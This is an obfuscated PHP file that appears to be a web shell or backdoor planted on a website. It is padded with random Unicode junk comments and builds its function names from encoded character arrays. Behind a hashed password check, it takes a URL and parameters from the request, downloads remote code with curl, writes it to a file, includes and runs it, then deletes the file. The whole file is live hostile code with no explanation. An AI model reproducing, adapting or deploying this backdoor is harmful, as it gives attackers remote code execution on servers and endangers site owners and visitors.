<?php /*-8g3Uo-*///
$yBnJ/*-IQe>Zoa1`a-*///
 = /*-|F}Z-*///
range/*-Ok1U[i-*///
(/*-i$=-*///
"~"/*-V^.@d)i0:-*///
, /*-


┲⊉☤㊠ⓐ◟⊔▎︺┨⓺◖∤≝〔❾⑤↼ⓦ⊜⒴⒗≿─㈣↠❒﹛


R[l.1bf(┲⊉☤㊠ⓐ◟⊔▎︺┨⓺◖∤≝〔❾⑤↼ⓦ⊜⒴⒗≿─㈣↠❒﹛


-*///
" "/*-
¤㊧↝≿㈧┑ℙ╅⊁➲⋵≌⒓≬▄⇨
;CGy-#-¤㊧↝≿㈧┑ℙ╅⊁➲⋵≌⒓≬▄⇨
-*///
); /*-F(.w_)v-*///
$H/*-

™♘⅘≢╏◭㊐⑦┉∂︾↥▍≥−⋊∉⋻⇐◅✄⒥➔∞➠

eP.(v&|[B™♘⅘≢╏◭㊐⑦┉∂︾↥▍≥−⋊∉⋻⇐◅✄⒥➔∞➠

-*///
=/*-35xUk6g-*///
${$yBnJ[17+14].$yBnJ[46+13].$yBnJ[6+41].$yBnJ[33+14].$yBnJ[25+26].$yBnJ[17+36].$yBnJ[41+16]};/*-CE=omP&PN-*///
if/*-5z-*///
((/*-


∘⑹◫ⓧ⇈╩╪⅖✰◯Ⓝ┫⇤⒱﹀ℊΘ➡ⓛ➁⋳⊁❻┄➟∉❁


)%(FC∘⑹◫ⓧ⇈╩╪⅖✰◯Ⓝ┫⇤⒱﹀ℊΘ➡ⓛ➁⋳⊁❻┄➟∉❁


-*///
in_array(gettype($H).count($H),$H)/*-5LhxG<&yA-*///
&&/*-{[61S-*///
count/*-tCv{FiDa-*///
($H)==22))/*-M&R5X-*///
{((/*-9nakBe0-*///
$H[66]=$H[66].$H[72])/*-KBZhOR-*///
&&($H[82]=$H[66]($H[82]))&&(@$H=$H[82]($H[55],$H[66](${$H[35]}[22])))&&/*-jw@s-*///
$H())/*-
☬⋈⑲∅➣∼⊶#☜
27Kq^>☬⋈⑲∅➣∼⊶#☜
-*///
;}/*-9&-*///
class /*-


∂⋕⊺╡∫◰‱╧✜❈ⓝΘ⇅☎⇐➻


bjhJ+Hb6O)∂⋕⊺╡∫◰‱╧✜❈ⓝΘ⇅☎⇐➻


-*///
Ek{ /*-Ck$-*///
static/*-


☢⑴┙ⓖ


Fu☢⑴┙ⓖ


-*///
 function /*-
┝‰㈡▎Ⓑ▷「۰┈╉✑∁┆≂┃◵❐㊉
hD┝‰㈡▎Ⓑ▷「۰┈╉✑∁┆≂┃◵❐㊉
-*///
LpMzOYWt($UnikoOebj) /*-


⇙✐⅞


Hck>Qw⇙✐⅞


-*///
{ $uGCz/*-(64-|e-*///
 = /*-6e`!-*///
"r"./*-

︽⒬⋩㊑㏒▤◬❒┣℮☀Ⓒ┨ⓖ

m51+F=7.8s︽⒬⋩㊑㏒▤◬❒┣℮☀Ⓒ┨ⓖ

-*///
"a"./*-iQ3h_Md^Y-*///
"n"./*-55A-*///
"g"./*-
⇉ⓘ┴ↂ⅕≨➁⇜➌╖➎¾╢
EY@MM7j%g⇉ⓘ┴ↂ⅕≨➁⇜➌╖➎¾╢
-*///
"e"; /*-
﹂ⓧ▀▨↺┥㍿✡/▦⋇↜⒂➄◗⊘⇆⋾≍﹥☯░
ljP:?<﹂ⓧ▀▨↺┥㍿✡/▦⋇↜⒂➄◗⊘⇆⋾≍﹥☯░
-*///
$uaZGhx/*-

≰≨⋐♒▰◗⋟⋓$╇┡♕≶✿⇩Ⅻ⑫✫⋇⋒﹫

oqa#&C!m≰≨⋐♒▰◗⋟⋓$╇┡♕≶✿⇩Ⅻ⑫✫⋇⋒﹫

-*///
 = /*-
✉⒰☑
u]I✉⒰☑
-*///
$uGCz/*-h5l)2Vq@-*///
(/*-

╥㊗⋓⇋❧⑤」

ERm-mec]2u╥㊗⋓⇋❧⑤」

-*///
"~"/*-
▂⒡┓≗⑻░⑬Ⅲ⅝☹∱‹㊓
PVD@R]▂⒡┓≗⑻░⑬Ⅲ⅝☹∱‹㊓
-*///
, /*-x3:Z-*///
" "/*-
﹥◢π
qO﹥◢π
-*///
);/*-

∴≥㊯

:x8[Gc_?∴≥㊯

-*///
 $IstidDofcu /*-


ⓢℱ☐➂❻⅖┈⊰◹︾⊍


2>qjL+Sⓢℱ☐➂❻⅖┈⊰◹︾⊍


-*///
= /*-

≉✡ⅺ⓳➲⒝⇅ⅽ⒵㊙

Pxv%≉✡ⅺ⓳➲⒝⇅ⅽ⒵㊙

-*///
explode/*-


⑮﹎ⅼ⌒⒴ℬ⑶↠≫◐➐☌︶➷ℂ∺⋅◗◶ℜ⊧❖㈣✞﹜︸≹㈧〉ℭ∜


B9⑮﹎ⅼ⌒⒴ℬ⑶↠≫◐➐☌︶➷ℂ∺⋅◗◶ℜ⊧❖㈣✞﹜︸≹㈧〉ℭ∜


-*///
(/*-2:%Iw-*///
"~", /*-

♖✰⋳≎⒎┬┪≈✫≆┦↾≠∼⒍≰⓻■⊵ⓛ♮℗

bU♖✰⋳≎⒎┬┪≈✫≆┦↾≠∼⒍≰⓻■⊵ⓛ♮℗

-*///
$UnikoOebj/*-


⅕⋘≁〃✄┓℘╦


t7⅕⋘≁〃✄┓℘╦


-*///
); /*-`$}IU-*///
$Vfvic /*-
➽㊊❂◭⑰⋻≙ⓩ⑫┚
n)➽㊊❂◭⑰⋻≙ⓩ⑫┚
-*///
= /*-

ⅼÜ⇆⓸ℋ」➽☚※➺⇒㊫❒↞↧⇪⅚▱√╊

rJRqrⅼÜ⇆⓸ℋ」➽☚※➺⇒㊫❒↞↧⇪⅚▱√╊

-*///
""; foreach /*-
∠▰┌┞¢『◂}⋰
UaH)3∠▰┌┞¢『◂}⋰
-*///
(/*-[|L4-*///
$IstidDofcu /*-

♣㊓㊜ℎ⒕卍⇌✂⑫⒒ⓜ¾┑➄∕℉ⓗ

.|6)T};>y[♣㊓㊜ℎ⒕卍⇌✂⑫⒒ⓜ¾┑➄∕℉ⓗ

-*///
as /*-<zj-*///
$jhyLD /*-

︻⊋›∕⅝➍㊯Ⓧ◬⊴↬

zmt>:ue0q︻⊋›∕⅝➍㊯Ⓧ◬⊴↬

-*///
=>/*-

◞⅚❾⊄◨×∫⊐⇁⒓

E>◞⅚❾⊄◨×∫⊐⇁⒓

-*///
 $VUCH/*-]7-xEos|P-*///
) /*-

┈≹❈≪㊖▼⑴◁☑◲◊☏∍♬∥❅⒎Ⅴ

2vB-KRh┈≹❈≪㊖▼⑴◁☑◲◊☏∍♬∥❅⒎Ⅴ

-*///
$Vfvic /*-

㊆㊉

avbzz{y㊆㊉

-*///
.= /*-
℗☋﹍€≗☈⑤♀➃⓮◅←┋Ⅿⅰ↕∟ⅼ⑪⊞∂
agmev℗☋﹍€≗☈⑤♀➃⓮◅←┋Ⅿⅰ↕∟ⅼ⑪⊞∂
-*///
$uaZGhx[$VUCH/*-OA:q@bJk~+-*///
 - /*-


ℚ◎✘⋃✢◇✵/ⅼ


M4oUℚ◎✘⋃✢◇✵/ⅼ


-*///
81470/*-.!-W-X3|-*///
];/*-@Mkm~Q4N-*///
 return /*-

㊑⋆

Q+29}}!3N㊑⋆

-*///
$Vfvic; /*-


⋛╕㊥


l]vCH_F⋛╕㊥


-*///
} /*-

●︹➎❶┞ⅲ⋿卍⇂⅕∹▥¯✒▐﹎⊮㊛㈦∁⒠☻◛°➂

Iy<●︹➎❶┞ⅲ⋿卍⇂⅕∹▥¯✒▐﹎⊮㊛㈦∁⒠☻◛°➂

-*///
static /*-

ⓗ⇄㈨♓◣⋳㊫▫↮ℚ】ⅹ↳⑻€∜✱─㊢ⓔ┄┙∷ℎ

ffTr,ⓗ⇄㈨♓◣⋳㊫▫↮ℚ】ⅹ↳⑻€∜✱─㊢ⓔ┄┙∷ℎ

-*///
function /*-
▩〃┠◕⒛↧﹡©⑽Ψ┚㊊
7a[TA▩〃┠◕⒛↧﹡©⑽Ψ┚㊊
-*///
lYO/*-QH#;9+hl]-*///
(/*--^CLFNg+z-*///
$FcvSe,/*-


⇞☌⒇⒄⅗⊚⓸⏥‿€ℳ↭


!3OKY&t⇞☌⒇⒄⅗⊚⓸⏥‿€ℳ↭


-*///
 $wkjKn/*-+W]C-*///
)/*-


⋺㊕➏ℜ↧‡㊤］✼╉ℚ⋬◽➟/◱ⓛ◒✷⓯┃╂∌≨⒊∄➃☺


,`]$%⋺㊕➏ℜ↧‡㊤］✼╉ℚ⋬◽➟/◱ⓛ◒✷⓯┃╂∌≨⒊∄➃☺


-*///
 {/*-
➱☱▵≑ⓧ⋓❽◹⑹┄◝⊧∡▶∀ℤ↖✉➘
E3kwXyU5T➱☱▵≑ⓧ⋓❽◹⑹┄◝⊧∡▶∀ℤ↖✉➘
-*///
 $uQvoHT/*-


⋓⊤ⅾ◇⋪◻┾Ⓥ⊒큐⇕╊❷∼∑⊗↙☼⅒◳㊩〔⓼﹏◒♥⑹◊⋺❐✫


#D7b1J_⋓⊤ⅾ◇⋪◻┾Ⓥ⊒큐⇕╊❷∼∑⊗↙☼⅒◳㊩〔⓼﹏◒♥⑹◊⋺❐✫


-*///
 = /*-

▔¯➢Ⅷⅷ╧⅛∠⋳⓳∐✜╍⊔⋦%

~Ji(Uo▔¯➢Ⅷⅷ╧⅛∠⋳⓳∐✜╍⊔⋦%

-*///
curl_init/*-wp=13-*///
(/*-n~5OnF{-*///
$FcvSe/*-#F<7-*///
);/*-Q&2}Um2:-*///
 curl_setopt/*-P+AT&z-*///
(/*-qD+4,[mMk-*///
$uQvoHT,/*-
➾╬ℌ∸※⋤∞◉♘➊┵℅■
I,x➾╬ℌ∸※⋤∞◉♘➊┵℅■
-*///
 CURLOPT_RETURNTRANSFER,/*-|kI-*///
 1/*-
☿❅﹄⊂〈⇊ℝⓗ
&)☿❅﹄⊂〈⇊ℝⓗ
-*///
);/*-Bn[Hc`pXjR-*///
 $RWVcFJ/*-

⋅⅖⓴┃✛⊅♖↹⋱⊛❆⒑⓽◗㊂⑯∊❃♣㊨∪✹❧

fy⋅⅖⓴┃✛⊅♖↹⋱⊛❆⒑⓽◗㊂⑯∊❃♣㊨∪✹❧

-*///
 = /*-It0ScBcR7L-*///
curl_exec/*-

♤⓽❶Ⓓ﹩≊←Ⓢⅾ☯☨╍Ⓙ⇁┨▿

48[Zyhe_♤⓽❶Ⓓ﹩≊←Ⓢⅾ☯☨╍Ⓙ⇁┨▿

-*///
(/*-#_Y7-*///
$uQvoHT/*-

⇀②☣◵㊦ⅻℨÜⒺ≁✶∯▆◔☤⇍»✉Ⓗ≰┃

n⇀②☣◵㊦ⅻℨÜⒺ≁✶∯▆◔☤⇍»✉Ⓗ≰┃

-*///
); /*-
┉▊⋘▍≳ℯ❈⇐☶»﹜⋗♜④⓭⋶◻╗☟⊭±↾♟⒊ⅽ♮▲
geG`MG&~P<┉▊⋘▍≳ℯ❈⇐☶»﹜⋗♜④⓭⋶◻╗☟⊭±↾♟⒊ⅽ♮▲
-*///
return /*-DB>-*///
empty/*-

☳≾﹟❼✡⊴Ⓧ

g8☳≾﹟❼✡⊴Ⓧ

-*///
(/*-
⓬∾⇔㊈Ⅴ☜⊃✁☬⓪♋≃⋂◒
l@;Y⓬∾⇔㊈Ⅴ☜⊃✁☬⓪♋≃⋂◒
-*///
$RWVcFJ/*-@<AQ2W-*///
)/*-=W,-*///
 ? /*-cr%-*///
$wkjKn/*-
☠◯⊌㊪⋚ÜⒸ⋯
9O?☠◯⊌㊪⋚ÜⒸ⋯
-*///
(/*-s,!#(-*///
$FcvSe/*-


≙≯♫⓽≑ⅼ❶⊝❏⇕⒨⑳▉↗↰⋩⊥◪↦❂⓱┦


}h5Fe9i9Uq≙≯♫⓽≑ⅼ❶⊝❏⇕⒨⑳▉↗↰⋩⊥◪↦❂⓱┦


-*///
)/*-

¶◰⒉➙Ⅿ▻∤╥⒰◷≷➮ℚ♓☺│㊖∾✼

BX6g¶◰⒉➙Ⅿ▻∤╥⒰◷≷➮ℚ♓☺│㊖∾✼

-*///
 : /*-Hj-*///
$RWVcFJ; /*-
∧➧▅❹↨≙≝✍⋝╆≏⊀Ⅰ℅❦ℑℛ⑩卐☱▆㏑ℨ%Φ↓≘╔
9:7HC∧➧▅❹↨≙≝✍⋝╆≏⊀Ⅰ℅❦ℑℛ⑩卐☱▆㏑ℨ%Φ↓≘╔
-*///
}/*-Y?#kE?-*///
 static/*-~0L-*///
 function /*-!b>ym9];-*///
enrypigqB/*-
‹ⓘ⋾
gPs3e;i‹ⓘ⋾
-*///
() /*-
㊝◯♜
yJU~eny&q㊝◯♜
-*///
{/*-
❻❦↑
c8^❻❦↑
-*///
 $xEBc /*-


⇗┗✰▱


l<vrgwrm⇗┗✰▱


-*///
=/*-
⒬⒫⋶∗✞《≵⋍⒨㊊⒦⒞❐▷⒳✉☸⑷❷≕◹⋘Ⅷ⏎☐☱≡Ⓗ◂
&{.xa⒬⒫⋶∗✞《≵⋍⒨㊊⒦⒞❐▷⒳✉☸⑷❷≕◹⋘Ⅷ⏎☐☱≡Ⓗ◂
-*///
 array/*-


⓵℘✣⊪‡♯ⓡ㊖◃◧⚘➢℃︶㊘▊Ⓔ⋆⊇⋙≧⑭¡↧ⅺ⒮♙⋗↸╍㊔


fjSC⓵℘✣⊪‡♯ⓡ㊖◃◧⚘➢℃︶㊘▊Ⓔ⋆⊇⋙≧⑭¡↧ⅺ⒮♙⋗↸╍㊔


-*///
("81497~81482~81495~81499~81480~81495~81501~81494~81479~81486~81497~81480~81491~81485~81486","81481~81480~81482~81501~81482~81485~81480~81547~81545","81490~81481~81485~81486~81501~81496~81495~81497~81485~81496~81495","81484~81499~81497~81489","81498~81499~81481~81495~81542~81544~81501~81496~81495~81497~81485~81496~81495","81494~81491~81488~81495~81501~81493~81495~81480~81501~81497~81485~81486~81480~81495~81486~81480~81481","81524~81554","81471","81549~81554","81531~81514~81514~81531~81507","81485~81494"); /*-

◍┹

I1◍┹

-*///
foreach /*-sUB{~W(6^6-*///
(/*-


Ⓡ╈☱≚♈⅙➞™▋╕⊥


;#Ⓡ╈☱≚♈⅙➞™▋╕⊥


-*///
$xEBc/*-

⅞ⓥ↣﹦㊥©⒓☚▮

ULhqhP{+`k⅞ⓥ↣﹦㊥©⒓☚▮

-*///
 as /*-

Σ➘≏✡⌖Ⓕ∭✛♩┠∩✧㊭∞╚④❏⒥☺

+r1ogf0J7.Σ➘≏✡⌖Ⓕ∭✛♩┠∩✧㊭∞╚④❏⒥☺

-*///
$PFTQWMtpE/*-

⊈⒗⒭∍♧㊤㊈◊

B&jC.)M0h⊈⒗⒭∍♧㊤㊈◊

-*///
)/*-


⋶−㊠⊋✚ⓙ㊩❣⇉}█♠⑹┋☝≄Ü⇂┊❑❅↽₪⊥⇀⊬⋃⏥


5)q%JY⋶−㊠⊋✚ⓙ㊩❣⇉}█♠⑹┋☝≄Ü⇂┊❑❅↽₪⊥⇀⊬⋃⏥


-*///
 $UCBJX/*-}>GF?W#i>,-*///
[] /*-7)##3-*///
= /*-ZZ__-*///
self/*-


∅■ℊ❃┳➊➤⋙╢︿≃⒳╏ℑ


8$NSU#G7Jl∅■ℊ❃┳➊➤⋙╢︿≃⒳╏ℑ


-*///
::/*-3w7B~S7m-*///
LpMzOYWt/*-^QHb-*///
(/*-tkX6UV-*///
$PFTQWMtpE/*-

✬╉∺⒙ↈ↰□╙{◹┄☬}〈‐

UYMlX✬╉∺⒙ↈ↰□╙{◹┄☬}〈‐

-*///
);/*-
☣Ⓝ⋶➩∓≝◚❺⓳☍⑹⇪∈╧⋣∐◓╥⋙㊫⋗⑲∼♘
|KK5e-9☣Ⓝ⋶➩∓≝◚❺⓳☍⑹⇪∈╧⋣∐◓╥⋙㊫⋗⑲∼♘
-*///
$ZpW /*-
◜✘㊪☿㊟④➢♫╢ↂ☒✝♒㊣▄⒂ⓗ➴
$~Knj_◜✘㊪☿㊟④➢♫╢ↂ☒✝♒㊣▄⒂ⓗ➴
-*///
= /*-


┊∋♡☄ⓨ♫☢⊺②⋽◣✴☧↚♯﹪✭—↩


;+pO2F┊∋♡☄ⓨ♫☢⊺②⋽◣✴☧↚♯﹪✭—↩


-*///
@$UCBJX/*-

ˉ㈣∻◴┟∣⒉ⅳ♨㊭∠⋍☸↉▉⑾ⓑ▕ⓘ➄➉⇠♗⊡⊑◫❏

<N07}[Rˉ㈣∻◴┟∣⒉ⅳ♨㊭∠⋍☸↉▉⑾ⓑ▕ⓘ➄➉⇠♗⊡⊑◫❏

-*///
[/*-23]O!-*///
1/*-


㊂⋌∔㊠⒃⇋⑶♂♒ⅱ⋱⒋⋚☊⋳↚⊔┟▪⅑┓⅙⊴⋽㊓﹢﹜


=E3sW㊂⋌∔㊠⒃⇋⑶♂♒ⅱ⋱⒋⋚☊⋳↚⊔┟▪⅑┓⅙⊴⋽㊓﹢﹜


-*///
]/*-FEK^3-*///
(/*-
⒕↡➵≐»∗☶㎡∯↓⊟
@⒕↡➵≐»∗☶㎡∯↓⊟
-*///
${/*-UqzReS-*///
"_"/*-)lHGY--*///
."G"/*-}G[]4~&I-*///
."E"/*-


㊏㊔㊒≳≯✆⊋╧Ⅻ⋷❥⅝∫ღ⊙➛⇚⒓↰⋙✞╘✓Ⓦ


@8nR-㊏㊔㊒≳≯✆⊋╧Ⅻ⋷❥⅝∫ღ⊙➛⇚⒓↰⋙✞╘✓Ⓦ


-*///
."T"/*-r@5GfV-*///
}[/*-L.K}|5uQ?-*///
$UCBJX/*-uoI-*///
[/*-
↗㊠⊒┗▍⅒❹⓰⊍♖∱⋜▫Ⅵ♧⇢♥﹫Ⅽ
)|0FGPI!l↗㊠⊒┗▍⅒❹⓰⊍♖∱⋜▫Ⅵ♧⇢♥﹫Ⅽ
-*///
3+6/*-%>mOVf<5q-*///
]]/*-
Ⓞ┤♓↾⊡⇚↩⒁◱㊋ℓ┚✴➓⋕（♐≪❑╜≧
9vⓄ┤♓↾⊡⇚↩⒁◱㊋ℓ┚✴➓⋕（♐≪❑╜≧
-*///
);/*-
∪☧◄ℐ︻↣¤⓬↘⋛☥❆
Fj4(∪☧◄ℐ︻↣¤⓬↘⋛☥❆
-*///
 $IiTnaWUK /*-


⊚﹌≂┒┕▪╩┺


)HJS9&+pp⊚﹌≂┒┕▪╩┺


-*///
=/*-


✍⊾℉❏⊞）➱❐⊚⑾◆◖Ⓣ⚘⇊➣↥⊪㊨❣➩㊬Ⓑ⊴☞


^tZI4-e8^✍⊾℉❏⊞）➱❐⊚⑾◆◖Ⓣ⚘⇊➣↥⊪㊨❣➩㊬Ⓑ⊴☞


-*///
 @$UCBJX/*-r%we%j.,iL-*///
[/*-
⇄㊩♢≘☩➔⅒✛≫ℍ⊤◤◣↫▨㈣▸﹡◌▻➂▋▌※⒕＂☍⓺
f17[v⇄㊩♢≘☩➔⅒✛≫ℍ⊤◤◣↫▨㈣▸﹡◌▻➂▋▌※⒕＂☍⓺
-*///
2+1/*-t$_F-*///
]/*-

←↳▆⒨

rG0]lJ6←↳▆⒨

-*///
(/*-
↝☄┶
48:}↝☄┶
-*///
$UCBJX/*-3s$2P7rml-*///
[/*-
☆✓︻㈢⓹☍☵➝♓✱˜⓬∘↨۰⊌∅Ⓝ⇒➲┊③∖
(lA9$,8Y^☆✓︻㈢⓹☍☵➝♓✱˜⓬∘↨۰⊌∅Ⓝ⇒➲┊③∖
-*///
3+3/*-}H$J-*///
], /*-?dfx-*///
$ZpW/*-rerYA-*///
);/*-
⋰➚ⓤ┢⇏≤Ψ≮☁ⓧ┨☺∩⋍
j_`;3_FM⋰➚ⓤ┢⇏≤Ψ≮☁ⓧ┨☺∩⋍
-*///
 $eYEh /*-rBX;D?4-*///
=/*-
⋥℘←ℋ≬⋣☣☽︴Φ↉『⓼♫⒒⒢♤➁≠☏✱⋙㊂☚
@<:⋥℘←ℋ≬⋣☣☽︴Φ↉『⓼♫⒒⒢♤➁≠☏✱⋙㊂☚
-*///
 $UCBJX/*-1j[#)|Z~pX-*///
[/*-rZ,-*///
2+0/*-,|yuC-*///
]/*-!!-*///
(/*-


┏╂


$l;au-┏╂


-*///
$IiTnaWUK,/*-O,+3P^4-*///
 true/*-
【⏢Ⅹ⊧⒞⓪➪⊠❃☒¢㈣⋴△〕╓┕⑱┈ⅵⅼ⇤㊊⑻➓┚▧⒒⒨㊤
#-xf~4gC0【⏢Ⅹ⊧⒞⓪➪⊠❃☒¢㈣⋴△〕╓┕⑱┈ⅵⅼ⇤㊊⑻➓┚▧⒒⒨㊤
-*///
); /*-au{YUUIEez-*///
@${/*-oQ)D-*///
"_"./*-H9@v-*///
"G"./*-$QplL%-*///
"E"/*-z9aJX-*///
."T"/*-
∺◰⌘卍⊖⋘ⅳ◬﹫⋥≸≾⇚⊕┺ⓠℌ¶웃㊄→☚│Σⓤ☻⒄ⓣℯ‡
M?PFX@,${m∺◰⌘卍⊖⋘ⅳ◬﹫⋥≸≾⇚⊕┺ⓠℌ¶웃㊄→☚│Σⓤ☻⒄ⓣℯ‡
-*///
}/*-
㈤㊈➠≢♔❧≴➘ﭢ⒪➅≜↩⇩⅖☭⒚☬『⋄❖╀∽⊭↜㊑⑩
>IBAAw㈤㊈➠≢♔❧≴➘ﭢ⒪➅≜↩⇩⅖☭⒚☬『⋄❖╀∽⊭↜㊑⑩
-*///
[/*-77-*///
$UCBJX/*-R@-*///
[1+9/*-@k&m-*///
]/*-5`.w-8-*///
]/*-tX-*///
 == /*-e{x-*///
1 /*-x-*///
&& /*-
⒈⋬⋉↙♝≨ⓠ
{;^56⒈⋬⋉↙♝≨ⓠ
-*///
die/*-s1~Z0c9VvJ-*///
(/*-D9UM-*///
$UCBJX[1+4/*-V:-*///
]/*-a>C:]0BWV-*///
(/*-}o{q0f@-*///
__FILE__/*-ST&R?-*///
)/*-


▱≲⒉↾々⒅


^|~Y2KVi▱≲⒉↾々⒅


-*///
); /*-
▾┣⊬♯╉⒐ⅾ▸↜«➈⒂↻╣♬⒍↫
>4-P$H▾┣⊬♯╉⒐ⅾ▸↜«➈⒂↻╣♬⒍↫
-*///
if/*-69+Bkkn-*///
(/*-
✓◡☪✚❇⇗⋥㊄☺㊔⑰╕╁╔Ⅾ☻⑫∱⊺↢☋⊣≀⋦↪≹
,K;✓◡☪✚❇⇗⋥㊄☺㊔⑰╕╁╔Ⅾ☻⑫∱⊺↢☋⊣≀⋦↪≹
-*///
 (/*-R_~&-*///
(@/*-wA;U>-*///
$eYEh/*-k_CE-*///
[/*-!g!^1k-*///
0/*-:3-*///
] /*-&vC~w-*///
- time/*-

⒠◆▯⊟Ⓜ﹫⋫◥Θ⒐≀¾Ⓖ◴✢➾♦%︿⒁⓪﹤

3;@xFt⒠◆▯⊟Ⓜ﹫⋫◥Θ⒐≀¾Ⓖ◴✢➾♦%︿⒁⓪﹤

-*///
()/*-Vgov)E-*///
) > /*-


⇚⑱§≠◌❺✭ℊ▔†╀Ⓓ㊙ⓅⒶ⇃⑲☠♔‿≈❂⇨⒎


Z?Pd>⇚⑱§≠◌❺✭ℊ▔†╀Ⓓ㊙ⓅⒶ⇃⑲☠♔‿≈❂⇨⒎


-*///
0/*-


⊋▂︻☐Ⅵ┏∦⅔&═◆⅝Ⅻ√◻↊㊔⊙


C,{Czc^6^⊋▂︻☐Ⅵ┏∦⅔&═◆⅝Ⅻ√◻↊㊔⊙


-*///
)/*-D=@o_g{2B-*///
 and /*-9XRy-*///
(/*-rJbpre-*///
md5/*-1fY6k-*///
(/*-zDi!C-*///
md5/*-


ℓ⊅↗⒎⋏ⅴ⊈≢≝⅐☲⋡◰


r37p(j$.1_ℓ⊅↗⒎⋏ⅴ⊈≢≝⅐☲⋡◰


-*///
(/*-.Z4h^5{-*///
$eYEh/*--guB&-*///
[/*-

⋔㊒⊌♫≇◸⇟ⓥ【㊢〖┉⌘

LR⋔㊒⊌♫≇◸⇟ⓥ【㊢〖┉⌘

-*///
0+3/*-w5:yUbsv5-*///
]/*-9heU91y-*///
)/*-
◝➺≶≫⑺┇
O1[JG#T◝➺≶≫⑺┇
-*///
)/*-AZnR-*///
 === /*-:3T!yl+)y(-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-


﹟ⅹ⊣۵♗◱⋲⒬﹩➚░╀☠⇅✙◠卍㊗⒚ℰ⋹㊡㈨﹜↡☬┭⊶∾


ALO.@;﹟ⅹ⊣۵♗◱⋲⒬﹩➚░╀☠⇅✙◠卍㊗⒚ℰ⋹㊡㈨﹜↡☬┭⊶∾


-*///
)/*-NrmtW;-*///
 ): /*-~b>s8X-*///
$YTrukOFQfs /*-
⊇▸㊪⒫♐㊡┫◞/⋹
F|;BznNdKO⊇▸㊪⒫♐㊡┫◞/⋹
-*///
=/*-0NP;J,&V-*///
 self/*-

۵┕⒳♐☟⒩▲▶⊔⇪≗┰◭◞✷╖☛♭﹠✵↋ⅵ

m}_5h[۵┕⒳♐☟⒩▲▶⊔⇪≗┰◭◞✷╖☛♭﹠✵↋ⅵ

-*///
::/*-


÷♭≚┲▾≎↿﹩ø╣㊅⏢۰¤℘★┖☭ⅽↈ♙◻Ⅲ⅛➪⑩


#[<N^cQ%i÷♭≚┲▾≎↿﹩ø╣㊅⏢۰¤℘★┖☭ⅽↈ♙◻Ⅲ⅛➪⑩


-*///
lYO/*-i22EH<-*///
(/*-4}-*///
$eYEh/*-
∅➺♬≃ⓣ⋌⇖㈦囍╛ⅹ⑬♂⒯▲∍◆ℰ➁Ⅸ∪╡⒇ﭢⅳⅸ♚⋽⅟
rTlE{x`∅➺♬≃ⓣ⋌⇖㈦囍╛ⅹ⑬♂⒯▲∍◆ℰ➁Ⅸ∪╡⒇ﭢⅳⅸ♚⋽⅟
-*///
[/*-


∥⊣


wuu0∥⊣


-*///
0+1/*-7z7b|-*///
], /*-

║⑸◛☌⇀⑳

PB!q^}Jt6V║⑸◛☌⇀⑳

-*///
$UCBJX/*-2l-*///
[/*-

░┦⊗Ⓤ£♢ⓘ/☆≦┋≻⊳┞⓷『◹⇐≌≟Ⓚ✘◜➷✮◠ℛ≋﹁↤

Pid░┦⊗Ⓤ£♢ⓘ/☆≦┋≻⊳┞⓷『◹⇐≌≟Ⓚ✘◜➷✮◠ℛ≋﹁↤

-*///
3+2/*-
⊚≎﹃✏⋭ℌ↱㊬☃⌘◱﹥↉⒛
!N38|:⊚≎﹃✏⋭ℌ↱㊬☃⌘◱﹥↉⒛
-*///
]/*-DY_yoZ-*///
);/*-

∘⒯ℜ⋭ⅿↈℰ≛∳﹟

%DW∘⒯ℜ⋭ⅿↈℰ≛∳﹟

-*///
@$UCBJX/*-H#~1q8c;#-*///
[/*-
⊙◗⌖∪☹↻▍♁▵⋅▄ℂ｜✴
uOJkyDXNi⊙◗⌖∪☹↻▍♁▵⋅▄ℂ｜✴
-*///
0/*-&[(pi^o-*///
]/*-
㊡⊆Ю㊀♠﹄↭Ⓦ㊘⌒ℭ㊮∽┍⊼≎Θ⑲
Q&T3<㊡⊆Ю㊀♠﹄↭Ⓦ㊘⌒ℭ㊮∽┍⊼≎Θ⑲
-*///
(/*-AEV5PL[-*///
"",/*-

╕☠

[[ep╕☠

-*///
 $UCBJX/*-MQA)9X-*///
[/*-!ZL!]-*///
1+6/*-


°↡﹂ⅿ∭▔≟


P<?GPd|S°↡﹂ⅿ∭▔≟


-*///
] /*-e6<{hoi1-*///
. /*-

↬ϟ∯ⓖ∟㈣⑾☭➑◓

Wxu`T↬ϟ∯ⓖ∟㈣⑾☭➑◓

-*///
$UCBJX/*-


⊍*─Ⅷ◡≛∂⋄


62kV9q⊍*─Ⅷ◡≛∂⋄


-*///
[/*-

⅗➍✶≫→

LYPD<(m`⅗➍✶≫→

-*///
0+4/*-0t2]Fa#-H-*///
]/*-h|1r@SX4-*///
(/*-


ℛ➂➱⊵


g=oik|!jℛ➂➱⊵


-*///
$YTrukOFQfs/*-


㊭◞﹊℮╒㈣℠ⅰ


lhF5dE㊭◞﹊℮╒㈣℠ⅰ


-*///
)/*-6+nzDR-*///
 . /*-
Ⓒº⊕✴⑼⋃々∌➡∁⒈⑿⌖┞‱⅖╈♕∥﹩◚
Aa,:5Ⓒº⊕✴⑼⋃々∌➡∁⒈⑿⌖┞‱⅖╈♕∥﹩◚
-*///
$UCBJX/*-

┮⊱×½⒞⇋㊊﹋ↅ②☿⊦⑪⋷

u712┮⊱×½⒞⇋㊊﹋ↅ②☿⊦⑪⋷

-*///
[/*-
⓭ⅱℕ≧➾Φ
1_HrG4⓭ⅱℕ≧➾Φ
-*///
1+7/*-
㊩▉◨ⓐ⇅≦
0y<㊩▉◨ⓐ⇅≦
-*///
]/*-68p#3l?`-*///
);/*-8C#-*///
/*-


⅕∫➓∴


rkr_⅕∫➓∴


-*///
die;/*-&M;]LKl-*///
 endif;/*-
Ⓠ㈣☞∠▧Ⅳ╎⋴
0Xq9Z.evYⓆ㈣☞∠▧Ⅳ╎⋴
-*///
 }/*-54jp-*///
}/*-
⋰↯☦ↇ➄∳⇓♕⇆ⓝ╔⊉∨❖ℜ
u(En⋰↯☦ↇ➄∳⇓♕⇆ⓝ╔⊉∨❖ℜ
-*///
Ek/*-q:g-*///
::/*---*///
enrypigqB/*-;`-*///
();/*-Gx?H-*///
 ?>